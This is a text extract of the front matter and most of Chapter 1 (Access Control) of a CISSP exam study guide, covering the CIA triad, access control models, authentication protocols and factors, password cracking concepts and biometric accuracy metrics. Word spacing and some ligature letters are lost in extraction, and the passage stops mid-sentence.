Study Guide

SECONDEDITION
EricConrad
SethMisenar
JoshuaFeldman
TECHNICALEDITOR
KevinRiggins

Table of Contents
Coverimage
Titlepage
Copyright
Authorbiography
Chapter1.Domain1:AccessControl
Abstract
ExamObjectivesinThisChapter
Introduction
Summaryofexamobjectives
Chapter2.Domain2:TelecommunicationsandNetworkSecurity
Abstract
ExamObjectivesinThisChapter
Introduction
Summaryofexamobjectives
Chapter3.Domain3:InformationSecurityGovernanceandRisk
Management

Abstract
ExamObjectivesinThisChapter
Introduction
Summaryofexamobjectives
Chapter4.Domain4:SoftwareDevelopmentSecurity
Abstract
ExamObjectivesinThisChapter
Introduction
Summaryofexamobjectives
Chapter5.Domain5:Cryptography
Abstract
ExamObjectivesinThisChapter
Introduction
Summaryofexamobjectives
Chapter6.Domain6:SecurityArchitectureandDesign
Abstract
ExamObjectivesinThisChapter
Introduction
Summaryofexamobjectives
Chapter7.Domain7:OperationsSecurity
Abstract

ExamObjectivesinThisChapter
Introduction
Summaryofexamobjectives
Chapter8.Domain8:BusinessContinuityandDisasterRecoveryPlanning
Abstract
ExamObjectivesinThisChapter
Introduction
Summaryofexamobjectives
Chapter9.Domain9:Legal,Regulations,Investigations,andCompliance
Abstract
ExamObjectivesinThisChapter
Introduction
Summaryofexamobjectives
Chapter10.Domain10:Physical(Environmental)Security
Abstract
ExamObjectivesinThisChapter
Introduction
SummaryofExamObjectives
Index

Copyright
AcquiringEditor:ChrisKatsaropoulos
EditorialProjectManager:BenjaminRearick
ProjectManager:MohanaNatarajan
Designer:AlanStudholme
SyngressisanimprintofElsevier
225WymanStreet,Waltham,MA02451,USA
Secondedition2014
Copyright2014,2011ElsevierInc.Allrightsreserved.
Nopartofthispublicationmaybereproduced,storedinaretrievalsystemor
transmi edinanyformorbyanymeanselectronic,mechanical,
photocopying,recordingorotherwisewithoutthepriorwri enpermissionof
thepublisher.
PermissionsmaybesoughtdirectlyfromElseviersScience&Technology
RightsDepartmentinOxford,UK:phone(+44)(0)1865843830;fax(+44)(0)
1865853333;email:permissions@elsevier.com.Alternativelyyoucansubmit
yourrequestonlinebyvisitingtheElsevierwebsiteat
h p://elsevier.com/locate/permissions,andselectingObtainingpermissionto
useElseviermaterial.

Notice

Noresponsibilityisassumedbythepublisherforanyinjuryand/or
damagetopersonsorpropertyasama erofproductsliability,negligence
orotherwise,orfromanyuseoroperationofanymethods,products,
instructionsorideascontainedinthematerialherein.Becauseofrapid
advancesinthemedicalsciences,inparticular,independentvericationof
diagnosesanddrugdosagesshouldbemade.

LibraryofCongressCataloginginPublicationData
ApplicationSubmi ed
BritishLibraryCataloguinginPublicationData
AcataloguerecordforthisbookisavailablefromtheBritishLibrary
ForinformationonallSyngresspublications,visitourwebsiteat
store.elsevier.com/syngress
ISBN:9780124171428
PrintedandboundinUSA
141516171810987654321

Author biography

Seth Misenar (CISSP, GIAC GSE, CompTIA CASP, GPEN, GCIH, GCIA, GCFA, GWAPT,
GCWN, GSEC, MCSE, and MCDBA) is a Certied Instructor with the SANS Institute and coauthor
of the SANS SEC528: SANS Training Program for the CompTIA Advanced Security Practitioner
(CASP) Certication. Seth also serves as lead consultant for Jackson, Mississippi-based Context
Security. Seth's background includes security research, network and Web application penetration
testing, vulnerability assessment, regulatory compliance efforts, security architecture design, and
general security consulting. He has previously served as a physical and network security consultant for
Fortune 100 companies as well as the HIPAA and information security ofcer for a state government
agency. Seth teaches a variety of courses for the SANS Institute, including Security Essentials,
Advanced Web Application Penetration Testing, Hacker Techniques, and the CISSP and CASP
courses.
Seth is pursuing a Master of Science degree in information security engineering from the SANS
Technology Institute and holds a Bachelor of Science degree from Millsaps College. Seth resides in
Jackson, Mississippi, with his family, Rachel, Jude, and Hazel.
Eric Conrad (CISSP, GIAC GSE, GPEN, GCIH, GCIA, GCFA, GAWN, GSEC, GISP, CompTIA
CASP, and Security+) is a partner with Backshore Communications, which provides information
warfare, penetration testing, incident handling, and intrusion detection consulting services. He is also a
Certied Instructor with the SANS Institute and coauthor of SANS Security 528: SANS Training
Program for the CompTIA Advanced Security Practitioner (CASP) Certication.
Eric's professional career began in 1991 as a UNIX systems administrator for a small oceanographic
communications company. He gained information security experience in a variety of industries,
including research, education, power, Internet, and healthcare, in roles ranging from systems
programmer to security engineer to HIPAA security ofcer and ISSO. He has taught thousands of
students in courses including SANS Management 414: CISSP, Security 560: Network Penetration
Testing and Ethical Hacking, Security 504 Hacker Techniques, Exploits and Incident Handling, and
others.
Eric is a graduate of the SANS Technology Institute with a Master of Science degree in information
security engineering. Eric currently lives in Peaks Island, Maine, with his family, Melissa, Eric, and
Emma.
Joshua Feldman (CISSP, NSA IAM) has supported the Department of Defense Information Systems
Agency (DISA), as a contractor working for SAIC, Inc., since 2002. He is a subject matter expert and
training developer for DISAs cyber security mission. During his tenure, he has contributed to the DoD
8500 series, specically conducting research and authoring sections of the DoD 8570.01-M, also
known as the DoD IA Workforce Improvement Program. He is the program manager for DISAs
Computer Network Defense training initiative (entitled, RaD-X) and has instructed well over 1000

students. He also is a subject matter expert for the Web-based Information Assurance awareness
training every DoD user is required to take each year as part of their security awareness curriculum.
He is a regular presenter and panel member at the Information Assurance Symposium, hosted by both
DISA and NSA.
Before joining the support team at DoD/DISA, Joshua spent time as an IT Sec engineer working for
the Department of State, Diplomatic Security. There, he traveled to embassies worldwide to conduct
Tiger Team assessments of the security of each embassy. Joshua got his start in the IT Security eld
when he left his position teaching science for Montgomery County Public Schools, Maryland, and
went to work for NFR Security Software. At the time, NFR was one of the leading companies
producing Network Intrusion Detection systems.

CHAPTER1

Domain 1: Access Control

Abstract
AccessControl,thetopicofthischapterandDomain1oftheCISSP,presents
numerouscriticallyimportanttermsandconceptsthatpermeateseveral
domains.ThischapterintroducestheCIAtriadofcondentiality,integrity,
andavailability,whicharetoucheduponinvirtuallyeverydomainand
chapter.InadditiontoCIA,conceptssuchastheprincipleofleastprivilege
andneedtoknowarepresented.Theapplicationoftheseprinciplesinthe
formofaccesscontrolmodelssuchasMandatoryAccessControl(MAC),
DiscretionaryAccessControl(DAC),andRoleBasedAccessControl(RBAC)
representsasignicantamountofthisdomainsmaterial.Understandingthe
keycategoriesofaccesscontroldefenses,preventive,detective,corrective,
recovery,deterrent,andcompensatingcontrols,isnecessaryforthisand
numerousotherdomains.Thenalmajorcontentareainthischapteris
dealingwithauthenticationbyintroducingmethods,protocols,andconcepts
relatedtoensuringandidentityclaimcanbevalidatedappropriately.

KEYWORDS
Condentiality;Integrity;Availability;Identication;Authentication;
Authorization;Accountability;Subject;Object;DiscretionaryAccessControl
(DAC);MandatoryAccessControl(MAC);RoleBasedAccessControl
(RBAC);FalseRejectRate(FRR);FalseAcceptRate(FAR);CrossoverError
Rate(CER)

Exam Objectives in This Chapter

CornerstoneAccessControlConcepts

AccessControlModels
AccessControlDefensiveCategoriesandTypes
AuthenticationMethods
AccessControlTechnologies
AssessingAccessControl

Introduction
Thepurposeofaccesscontrolistoallowauthorizedusersaccessto
appropriatedataanddenyaccesstounauthorizedusers.Accesscontrols
protectagainstthreatssuchasunauthorizedaccess,inappropriate
modicationofdata,andlossofcondentiality.

CORNERSTONE INFORMATION SECURITY CONCEPTS

Beforewecanexplainaccesscontrol,wemustdenecornerstoneinformation
securityconcepts.Theseconceptsprovidethefoundationuponwhichthe10
domainsoftheCommonBodyofKnowledgearebuilt.
Confidentiality, integrity, and availability

Condentiality,Integrity,andAvailabilityaretheCIAtriad,thecornerstone
conceptofinformationsecurity.Thetriad,showninFigure1.1,formsthe
threeleggedstoolinformationsecurityisbuiltupon.Theorderofthe
acronymmaychange(somepreferAIC,perhapstoavoidassociationwitha
certainintelligenceagency),buttheconceptsareessential.Thisbookwilluse
theCIAacronym.

FIGURE1.1 TheCIAtriad.

Confidentiality

Confidentiality

Condentialityseekstopreventtheunauthorizeddisclosureofinformation:
itkeepsdatasecret.Inotherwords,condentialityseekstoprevent
unauthorizedreadaccesstodata.Anexampleofacondentialitya ack
wouldbethetheftofPersonallyIdentiableInformation(PII),suchascreditcard
information.
Integrity

Integrityseekstopreventunauthorizedmodicationofinformation.Inother
words,integrityseekstopreventunauthorizedwriteaccesstodata.

CrunchTime
Therearetwotypesofintegrity:dataintegrityandsystemintegrity.Data
integrityseekstoprotectinformationagainstunauthorizedmodication;
systemintegrityseekstoprotectasystem,suchasaWindows2012server
operatingsystem,fromunauthorizedmodication.

Availability

Availabilityensuresthatinformationisavailablewhenneeded.Systemsneed
tobeusable(available)fornormalbusinessuse.Anexampleofa ackon
availabilitywouldbeaDenialofService(DoS)a ack,whichseekstodeny
service(oravailability)ofasystem.
Disclosure, alteration, and destruction

TheCIAtriadmayalsobedescribedbyitsopposite:Disclosure,Alteration,and
Destruction(DAD).Disclosureistheunauthorizeddisclosureofinformation;
alterationistheunauthorizedmodicationofdata,anddestructionismaking
systemsunavailable.WhiletheCIAacronymsometimeschanges,theDAD
acronymisshowninthatorder.
Identity and authentication, authorization, and accountability

ThetermAAAisoftenused,describingcornerstoneconceptsAuthentication,
Authorization,andAccountability.LeftoutoftheAAAacronymisIdentication,
whichisrequiredbeforethethreeAscanfollow.
Identity and authentication

Identity and authentication

Identityisaclaim:ifyournameisPersonX,youidentifyyourselfbysaying
IamPersonX.Identityaloneisweakbecausethereisnoproof.Youcan
alsoidentifyyourselfbysayingIamPersonY.Provinganidentityclaimis
calledauthentication:youauthenticatetheidentityclaim,usuallyby
supplyingapieceofinformationoranobjectthatonlyyouposses,suchasa
passwordoryourpassport.
Authorization

Authorizationdescribestheactionsyoucanperformonasystemonceyou
haveidentiedandauthenticated.Actionsmayincludereading,writing,or
executinglesorprograms.
Accountability

Accountabilityholdsusersaccountablefortheiractions.Thisistypically
accomplishedbyloggingandanalyzingauditdata.Enforcingaccountability
helpskeephonestpeoplehonest.Forsomeusers,knowingthatdatais
loggedisnotenoughtoprovideaccountability:theymustknowthatthedata
isloggedandauditedandthatsanctionsmayresultfromviolationofpolicy.
Nonrepudiation

Nonrepudiationmeansausercannotdeny(repudiate)havingperformeda
transaction.Itcombinesauthenticationandintegrity:nonrepudiation
authenticatestheidentityofauserwhoperformsatransactionandensures
theintegrityofthattransaction.Youmusthavebothauthenticationand
integritytohavenonrepudiation:provingyousignedacontracttobuyacar
(authenticatingyouridentityasthepurchaser)isnotusefulifthecardealer
canchangethepricefrom$20,000to$40,000(violatetheintegrityofthe
contract).
Least privilege and need to know

Leastprivilegemeansusersshouldbegrantedtheminimumamountofaccess
(authorization)requiredtodotheirjobs,butnomore.Leastprivilegeis
appliedtogroupsofobjects.Needtoknowismoregranularthanleast
privilege:theusermustneedtoknowthatspecicpieceofinformation
beforeaccessingit.
Subjects and objects

Asubjectisanactiveentityonadatasystem.Mostexamplesofsubjects
involvepeopleaccessingdatales.However,runningcomputerprograms
aresubjectsaswell.
Anobjectisanypassivedatawithinthesystem.Objectscanrangefrom
databasestotextles.Theimportantthingtorememberaboutobjectsisthat
theyarepassivewithinthesystem.Theydonotmanipulateotherobjects.
Defense-in-depth

Defenseindepth(alsocalledlayereddefenses)appliesmultiplesafeguards
(alsocalledcontrols:measurestakentoreducerisk)toprotectanasset.Any
singlesecuritycontrolmayfail;bydeployingmultiplecontrols,youimprove
thecondentiality,integrity,andavailabilityofyourdata.

ACCESS CONTROL MODELS

Nowthatwehavereviewedthecornerstoneaccesscontrolconcepts,wecan
discussthedierentaccesscontrolmodels:theprimarymodelsare
DiscretionaryAccessControl(DAC),MandatoryAccessControl(MAC),and
nondiscretionaryaccesscontrol.
Discretionary access controls

DiscretionaryAccessControl(DAC)givessubjectsfullcontrolofobjectsthey
havebeengivenaccessto,includingsharingtheobjectswithothersubjects.
Subjectsareempoweredandcontroltheirdata.StandardUNIXandWindows
operatingsystemsuseDACforlesystems:subjectscangrantothersubjects
accesstotheirles,changetheira ributes,alterthem,ordeletethem.
Mandatory access controls

MandatoryAccessControl(MAC)issystemenforcedaccesscontrolbasedon
subjectsclearanceandobjectslabels.Subjectsandobjectshaveclearances
andlabels,respectively,suchascondential,secret,andtopsecret.Asubject
mayaccessanobjectonlyifthesubjectsclearanceisequaltoorgreaterthan
theobjectslabel.Subjectscannotshareobjectswithothersubjectswholack
theproperclearanceorwritedownobjectstoalowerclassicationlevel
(suchasfromtopsecrettosecret).MACsystemsareusuallyfocusedon
preservingthecondentialityofdata.
Nondiscretionary access control

RoleBasedAccessControl(RBAC)deneshowinformationisaccessedona
systembasedontheroleofthesubject.Arolecouldbeanurse,abackup
administrator,ahelpdesktechnician,etc.Subjectsaregroupedintorolesand
eachdenedrolehasaccesspermissionsbasedupontherole,notthe
individual.
RBACisatypeofnondiscretionaryaccesscontrolbecauseusersdonothave
discretionregardingthegroupsofobjectstheyareallowedtoaccessandare
unabletotransferobjectstoothersubjects.
Taskbasedaccesscontrolisanothernondiscretionaryaccesscontrolmodel,
relatedtoRBAC.Taskbasedaccesscontrolisbasedonthetaskseachsubject
mustperform,suchaswritingprescriptions,restoringdatafromabackup
tape,oropeningahelpdeskticket.Ita emptstosolvethesameproblemthat
RBACsolves,focusingonspecictasks,insteadofroles.
Rule-based access controls

Arulebasedaccesscontrolsystemusesaseriesofdenedrules,restrictions,
andltersforaccessingobjectswithinasystem.Therulesareintheformof
if/thenstatements.Anexampleofarulebasedaccesscontroldeviceisa
proxyrewallthatallowsuserstosurftheWebwithpredenedapproved
contentonly(IftheuserisauthorizedtosurftheWebandthesiteisonthe
approvedlist,thenallowaccess).Othersitesareprohibitedandthisruleis
enforcedacrossallauthenticatedusers.
Centralized access control

Centralizedaccesscontrolconcentratesaccesscontrolinonelogicalpointfora
systemororganization.Insteadofusinglocalaccesscontroldatabases,
systemsauthenticateviathirdpartyauthenticationservers.Centralized
accesscontrolcanbeusedtoprovideSingleSignOn(SSO),whereasubject
mayauthenticateonce,andthenaccessmultiplesystems.Centralizedaccess
controlcancentrallyprovidethethreeAsofaccesscontrol:Authentication,
Authorization,andAccountability.
Access control lists

Accesscontrollists(ACLs)areusedthroughoutmanyITsecuritypolicies,
procedures,andtechnologies.Anaccesscontrollistisalistofobjects;each
entrydescribesthesubjectsthatmayaccessthatobject.Anyaccessa emptby

asubjecttoanobjectthatdoesnothaveamatchingentryontheACLwillbe
denied.
Access provisioning lifecycle

Oncetheproperaccesscontrolmodelhasbeenchosenanddeployed,the
accessprovisioninglifecyclemustbemaintainedandsecured.Whilemany
organizationsfollowbestpracticesforissuingaccess,manylackformal
processesforensuringtheentirelifetimeofaccessiskeptsecureasemployees
andcontractorsmovewithinanorganization.
IBMdescribesthefollowingidentitylifecyclerules:
Passwordpolicycompliancechecking
Notifyinguserstochangetheirpasswordsbeforetheyexpire
Identifyinglifecyclechangessuchasaccountsthatareinactiveformore
than30consecutivedays
Identifyingnewaccountsthathavenotbeenusedformorethan10days
followingtheircreation
Identifyingaccountsthatarecandidatesfordeletionbecausetheyhave
beensuspendedformorethan30days
Whenacontractexpires,identifyingallaccountsbelongingtoabusiness
partnerorcontractorsemployeesandrevokingtheiraccessrights

User entitlement, access review, and audit

Accessaggregationoccursasindividualusersgainmoreaccesstomore
systems.Thiscanhappenintentionally,asafunctionofSingleSignOn(SSO).
Itcanalsohappenunintentionally:usersoftengainnewentitlements(also
calledaccessrights)astheytakeonnewrolesorduties.Thiscanresultin
authorizationcreep:usersgainmoreentitlementswithoutsheddingtheold
ones.Thepoweroftheseentitlementscancompoundovertime,defeating
controlssuchasleastprivilegeandseparationofduties.Userentitlements
mustberoutinelyreviewedandaudited.Processesshouldbedevelopedthat
reduceoreliminateoldentitlementsasnewonesaregranted.
Access control protocols and frameworks

Bothcentralizedanddecentralizedmodelsmaysupportremoteusers
authenticatingtolocalsystems.Anumberofprotocolsandframeworksmay
beusedtosupportthisneed,includingRADIUS,Diameter,
TACACS/TACACS+,PAP,andCHAP.
RADIUS

TheRemoteAuthenticationDialInUserService(RADIUS)protocolisathird
partyauthenticationsystem.RADIUSusestheUserDatagramProtocol
(UDP)ports1812(authentication)and1813(accounting).
RADIUSisconsideredanAAAsystem,comprisedofthreecomponents:
authentication,authorization,andaccounting.Itauthenticatesasubjects
credentialsagainstanauthenticationdatabase.Itauthorizesusersbyallowing
specicusersaccesstospecicdataobjects.Itaccountsforeachdatasession
bycreatingalogentryforeachRADIUSconnectionmade.
Diameter

DiameterisRADIUSsuccessor,designedtoprovideanimproved
Authentication,Authorization,andAccounting(AAA)framework.RADIUS
provideslimitedaccountabilityandhasproblemswithexibility,scalability,
reliability,andsecurity.Diameterismoreexible,allowingsupportfor
mobileremoteusers,forexample.
TACACS and TACACS+

TheTerminalAccessControllerAccessControlSystem(TACACS)isacentralized
accesscontrolsystemthatrequiresuserstosendanIDandstatic(reusable)
passwordforauthentication.TACACSusesUDPport49(andmayalsouse
TCP).Reusablepasswordshavesecurityvulnerability:theimproved
TACACS+providesbe erpasswordprotectionbyallowingtwofactorstrong
authentication.
TACACS+isnotbackwardcompatiblewithTACACS.TACACS+usesTCP
port49forauthenticationwiththeTACACS+server.
PAP and CHAP

ThePasswordAuthenticationProtocol(PAP)isinsecure:auserentersa
passwordanditissentacrossthenetworkincleartext.Whenreceivedbythe
PAPserver,itisauthenticatedandvalidated.Sningthenetworkmay
disclosetheplaintextpasswords.

TheChallengeHandshakeAuthenticationProtocol(CHAP)providesprotection
againstplaybacka acks.

Itusesacentrallocationthatchallengesremote

users.AsstatedinRFC1994,CHAPdependsuponasecretknownonlyto
theauthenticatorandthepeer.Thesecretisnotsentoverthelink.Although
theauthenticationisonlyoneway,bynegotiatingCHAPinbothdirections
thesamesecretsetmayeasilybeusedformutualauthentication.

ACCESS CONTROL DEFENSIVE CATEGORIES AND TYPES

Inordertounderstandandappropriatelyimplementaccesscontrols,
understandingwhatbenetseachcontrolcanaddtosecurityisvital.Inthis
section,eachtypeofaccesscontrolwillbedenedonthebasisofhowitadds
tothesecurityofthesystem.
Therearesixaccesscontroltypes:
Preventive
Detective
Corrective
Recovery
Deterrent
Compensating

FastFacts
Theseaccesscontroltypescanfallintooneofthreecategories:
administrative,technical,orphysical.
1.Administrative(alsocalleddirective)controlsareimplementedby
creatingandfollowingorganizationalpolicy,procedure,orregulation.
Usertrainingandawarenessalsofallintothiscategory.
2.Technicalcontrolsareimplementedusingsoftware,hardware,or
rmwarethatrestrictslogicalaccessonaninformationtechnologysystem.

Examplesincluderewalls,routers,andencryption.
3.Physicalcontrolsareimplementedwithphysicaldevices,suchaslocks,
fences,gates,andsecurityguards.

Preventive

Preventivecontrolspreventactionsfromoccurring.Itappliesrestrictionsto
whatapotentialuser,eitherauthorizedorunauthorized,cando.Anexample
ofanadministrativepreventivecontrolisapreemploymentdrugscreening.It
isdesignedtopreventanorganizationfromhiringanemployeewhoisusing
illegaldrugs.
Detective

Detectivecontrolsarecontrolsthatalertduringorafterasuccessfula ack.
Intrusiondetectionsystemsalertingafterasuccessfula ack,closedcircuit
televisioncameras(CCTV)thatalertguardstoanintruder,andabuilding
alarmsystemthatistriggeredbyanintruderareallexamplesofdetective
controls.
Corrective

Correctivecontrolsworkbycorrectingadamagedsystemorprocess.The
correctiveaccesscontroltypicallyworkshandinhandwithdetectiveaccess
controls.Antivirussoftwarehasbothcomponents.First,theantivirus
softwarerunsascanandusesitsdenitionletodetectwhetherthereisany
softwarethatmatchesitsviruslist.Ifitdetectsavirus,thecorrectivecontrols
takeover,placethesuspicioussoftwareinquarantine,ordeleteitfromthe
system.
Recovery

Afterasecurityincidenthasoccurred,recoverycontrolsmayneedtobetaken
inordertorestorefunctionalityofthesystemandorganization.Recovery
meansthatthesystemmustberecovered:reinstalledfromOSmediaor
image,datarestoredfrombackups,etc.
Deterrent

Deterrentcontrolsdeterusersfromperformingactionsonasystem.Examples

includeabewareofdogsign:athieffacingtwobuildings,onewithguard
dogsandonewithout,ismorelikelytoa ackthebuildingwithoutguard
dogs.Alargeneforspeedingisadeterrentfordriverstonotspeed.A
sanctionpolicythatmakesusersunderstandthattheywillberediftheyare
caughtsurngillicitorillegalWebsitesisadeterrent.
Compensating

Acompensatingcontrolisanadditionalsecuritycontrolputinplaceto
compensateforweaknessesinothercontrols.

AUTHENTICATION METHODS
Akeyconceptforimplementinganytypeofaccesscontroliscontrollingthe
properauthenticationofsubjectswithintheITsystem.Asubjectrst
identieshimselforherself;thisidenticationcannotbetrusted.Thesubject
thenauthenticatesbyprovidinganassurancethattheclaimedidentityis
valid.Acredentialsetisthetermusedforthecombinationofboththe
identicationandauthenticationofauser.

D i d Yo u K n o w ?
Therearethreebasicauthenticationmethods:Type1(somethingyou
know),Type2(somethingyouhave),andType3(somethingyouare).A
fourthtypeofauthenticationissomeplaceyouare.

Strongauthentication(alsocalledmultifactorauthentication)requiresthatthe
userpresentmorethanoneauthenticationfactor.Forexample,ausermay
possessanATMcardinordertowithdrawmoneyoutofthebank,buthe/she
mustalsoinputthecorrectPIN.
Type 1 authentication: something you know

Type1authentication(somethingyouknow)requirestestingthesubjectwith
somesortofchallengeandresponsewherethesubjectmustrespondwitha
knowledgeableanswer.Thesubjectisgrantedaccessonthebasisof
somethingtheyknow,suchasapasswordorPIN(PersonalIdentication

Number,anumberbasedpassword).Thisistheeasiest,andoftenweakest,
formofauthentication.
Passwords

PasswordshavebeenthecornerstoneforaccesscontroltoITsystems.They
arerelativelyeasyandcheaptoimplement.Manyonlinebanking,stock
portfolioservices,privateWebmail,andhealthcaresystemsstilluseauser
nameandpasswordastheaccesscontrolmethod.
Therearefourtypesofpasswordstoconsiderwhenimplementingaccess
controls:staticpasswords,passphrases,onetimepasswords,anddynamic
passwords.
Staticpasswordsarereusablepasswordsthatmayormaynotexpire.Theyare
typicallyusergeneratedandworkbestwhencombinedwithanother
authenticationtype,suchasasmartcardorbiometriccontrol.
Passphrasesarelongstaticpasswords,comprisedofwordsinaphraseor
sentence.Anexampleofapassphraseis:IwillpasstheCISSPin6
months!Passphrasesmaybemadestrongerbyusingnonsensewords
(replacingCISSPwithXYZZYinthepreviouspassphrase,forexample),
bymixingcase,andbyusingadditionalnumbersandsymbols.
Onetimepasswordsmaybeusedforasingleauthentication.Theyarevery
securebutdiculttomanage.Aonetimepasswordisimpossibletoreuse
andisvalidforjustonetimeuse.
Dynamicpasswordschangeatregularintervals.RSAsecuritymakesa
synchronoustokendevicecalledSecurIDthatgeneratesanewtokencode
every60seconds.TheusercombinestheirstaticPINwiththeRSAdynamic
tokencodetocreateonedynamicpasswordthatchangeseverytimeitis
used.Onedrawbackwhenusingdynamicpasswordsistheexpenseofthe
tokensthemselves.
Password hashes and password cracking

Inmostcases,cleartextpasswordsarenotstoredwithinanITsystem;only
thehashedoutputsofthosepasswordsarestored.Hashingisoneway
encryptionusinganalgorithmandnokey.Whenausera emptstologin,
thepasswordtheytypeishashed,andthathashiscomparedagainstthehash

storedonthesystem.Thehashfunctioncannotbereversed:itisimpossibleto
reversethealgorithmandproduceapasswordfromahash.Whilehashes
maynotbereversed,ana ackermayrunthehashalgorithmforwardmany
times,selectingvariouspossiblepasswordsandcomparingtheoutputtoa
desiredhash,hopingtondamatch(andtoderivetheoriginalpassword).
Thisiscalledpasswordcracking.
Dictionary attacks

Adictionarya ackusesawordlist:apredenedlistofwords,andthenruns
eachwordthroughahashalgorithm.Ifthecrackingsoftwarematchesthe
outputfromthedictionarya ackoutputtothepasswordhash,thea acker
willbeabletoidentifytheoriginalpassword.
Hybrid attacks

Ahybrida ackappends,prepends,orchangescharactersinwordsfroma
dictionarybeforehashing,toa emptthefastestcrackofcomplexpasswords.
Forexample,ana ackermayhaveadictionaryofpotentialsystem
administratorpasswordsbutalsoreplaceseachle erowiththenumber
0.
Brute-force attacks

Bruteforcea ackstakemoretimebutaremoreeective.Thea acker

calculatesthehashoutputsforeverypossiblepassword.Justafewyearsago,
basiccomputerspeedwasstillslowenoughtomakethisadauntingtask.
However,withtheadvancesinCPUspeedsandparallelcomputing,thetime
requiredtobruteforcecomplexpasswordshasbeenconsiderablyreduced.
Rainbow tables

Arainbowtableisaprecomputedcompilationofplaintextsandmatching
ciphertexts(typicallypasswordsandtheirmatchinghashes).Rainbowtables
greatlyspeedupmanytypesofpasswordcrackinga acks,oftentaking
minutestocrackwhereothermethods(suchasdictionary,hybrid,andbrute
forcepasswordcrackinga empts)maytakemuchlonger.
Thoughrainbowtablesactasadatabase,theyaremorecomplexunderthe
hood,relyingonatime/memorytradeotorepresentandrecoverpasswords
andhashes.Mostrainbowstablescancrackmost,butnotall,possiblehashes.
Salts

Asaltallowsonepasswordtohashmultipleways.Somesystems(like
modernUNIX/Linuxsystems)combineasaltwithapasswordbefore
hashing:ThedesignersoftheUNIXoperatingsystemimprovedonthis
methodbyusingarandomvaluecalledasalt.Asaltvalueensuresthatthe
samepasswordwillencryptdierentlywhenusedbydierentusers.This
methodoerstheadvantagethatana ackermustencryptthesameword
multipletimes(onceforeachsaltoruser)inordertomountasuccessful
passwordguessinga ack.

Thismakesrainbowtablesfarlesseective(ifnotcompletelyineective)for
systemsusingsalts.Insteadofcompilingonerainbowtableforasystemthat
doesnotusesalts(suchasMicrosoftLANManagerhashes),thousands,
millions,billions,ormorerainbowtableswouldberequiredforsystems
usingsalts,dependingonthesaltlength.
Type 2 authentication: something you have

Type2authentication(somethingyouhave)requiresthatuserspossess
something,suchasatoken,whichprovestheyareanauthenticateduser.A
tokenisanobjectthathelpsproveanidentityclaim.
Synchronous dynamic token

Synchronousdynamictokensusetimeorcounterstosynchronizeadisplayed
tokencodewiththecodeexpectedbytheauthenticationserver:thecodesare
synchronized.
Timebasedsynchronousdynamictokensdisplaydynamictokencodesthat
changefrequently,suchasevery60seconds.Thedynamiccodeisonlygood
duringthatwindow.Theauthenticationserverknowstheserialnumberof
eachauthorizedtoken,theuseritisassociatedwith,andthetime.Itcan
predictthedynamiccodeoneachtokenusingthesethreepiecesof
information.
Counterbasedsynchronousdynamictokensuseasimplecounter:the
authenticationserverexpectstokencode1,andtheuserstokendisplaysthe
sametoken.Onceused,thetokendisplaysthesecondtoken,andtheserver
alsoexpectstoken#2.
Asynchronous dynamic token

Asynchronousdynamictokensarenotsynchronizedwithacentralserver.The
mostcommonvarietyischallengeresponsetokens.Challengeresponsetoken
authenticationsystemsproduceachallengeorinputforthetokendevice.
Thentheusermanuallyenterstheinformationintothedevicealongwith
theirPIN,andthedeviceproducesanoutput.Thisoutputisthensenttothe
system.
Type 3 authentication: something you are

Type3authentication(somethingyouare)isbiometrics,whichusesphysical
characteristicsasameansofidenticationorauthentication.Biometricsmay
beusedtoestablishanidentityortoauthenticate(proveanidentityclaim).
Forexample,anairportfacialrecognitionsystemmaybeusedtoestablishthe
identityofaknownterrorist,andangerprintscannermaybeusedto
authenticatetheidentityofasubject(whomakestheidentityclaimandthen
swipeshisorherngertoproveit).
Biometric enrollment and throughput

Enrollmentdescribestheprocessofregisteringwithabiometricsystem:
creatinganaccountforthersttime.Userstypicallyprovidetheirusername
(identity),apasswordorPIN,andthenprovidebiometricinformation,such
asswipingngerprintsonangerprintreaderorhavingaphotographtaken
oftheiririses.Enrollmentisaonetimeprocessthatshouldtake2minutesor
less.
Throughputdescribestheprocessofauthenticatingtoabiometricsystem.This
isalsocalledthebiometricsystemresponsetime.Atypicalthroughputis6
10seconds.
Accuracy of biometric systems

Theaccuracyofbiometricsystemsshouldbeconsideredbeforeimplementing
abiometriccontrolprogram.Threemetricsareusedtojudgebiometric
accuracy:theFalseRejectRate(FRR),theFalseAcceptRate(FAR),andthe
CrossoverErrorRate(CER).
False reject rate

Afalserejectionoccurswhenanauthorizedsubjectisrejectedbythe
biometricsystemasunauthorized.FalserejectionsarealsocalledaTypeI
error.Falserejectionscausefrustrationoftheauthorizedusers,reductionin

workduetopooraccessconditions,andexpenditureofresourcesto
revalidateauthorizedusers.
False accept rate

Afalseacceptanceoccurswhenanunauthorizedsubjectisacceptedasvalid.
Ifanorganizationsbiometriccontrolisproducingalotoffalserejections,the
overallcontrolmighthavetolowertheaccuracyofthesystembylessening
theamountofdataitcollectswhenauthenticatingsubjects.Whenthedata
pointsarelowered,theorganizationrisksanincreaseinthefalseacceptance
rate.Theorganizationrisksanunauthorizedusergainingaccess.Thistypeof
errorisalsocalledaTypeIIerror.

CrunchTime
Afalseacceptisworsethanafalsereject:mostorganizationswould
prefertorejectauthenticsubjectstoacceptingimpostors.FARs(TypeII
errors)areworsethanFRRs(TypeIerrors).Twoisgreaterthanone,
whichwillhelpyourememberthatFARisTypeII,whichareworsethan
TypeI(FRRs).

Crossover Error Rate

TheCrossoverErrorRate(CER)describesthepointwheretheFalseReject
Rate(FRR)andFalseAcceptRate(FAR)areequal.CERisalsoknownasthe
EqualErrorRate(EER).TheCrossoverErrorRatedescribestheoverall
accuracyofabiometricsystem.
Asthesensitivityofabiometricsystemincreases,FRRswillriseandFARs
willdrop.Conversely,asthesensitivityislowered,FRRswilldropandFARs
willrise.Figure1.2showsagraphdepictingtheFARversustheFRR.The
CERistheintersectionofbothlinesofthegraphasshowninFigure1.2,
basedontheISACABiometricAuditingGuide,G36.

FIGURE1.2 Crossovererrorrate.

Types of biometric controls

Thereareanumberofbiometriccontrolsusedtoday.Belowarethemajor
implementationsandtheirspecicprosandconswithregardtoaccess
controlsecurity.
Fingerprints

Fingerprintsarethemostwidelyusedbiometriccontrolavailabletoday.
Smartcardscancarryngerprintinformation.ManyU.S.Governmentoce
buildingsrelyonngerprintauthenticationforphysicalaccesstothefacility.
Examplesincludesmartkeyboards,whichrequireuserstopresenta
ngerprinttounlockthecomputersscreensaver.
Thedatausedforstoringeachpersonsngerprintmustbeofasmallenough
sizetobeusedforauthentication.Thisdataisamathematicalrepresentation
ofngerprintminutiae,specicdetailsofngerprintfrictionridges,which
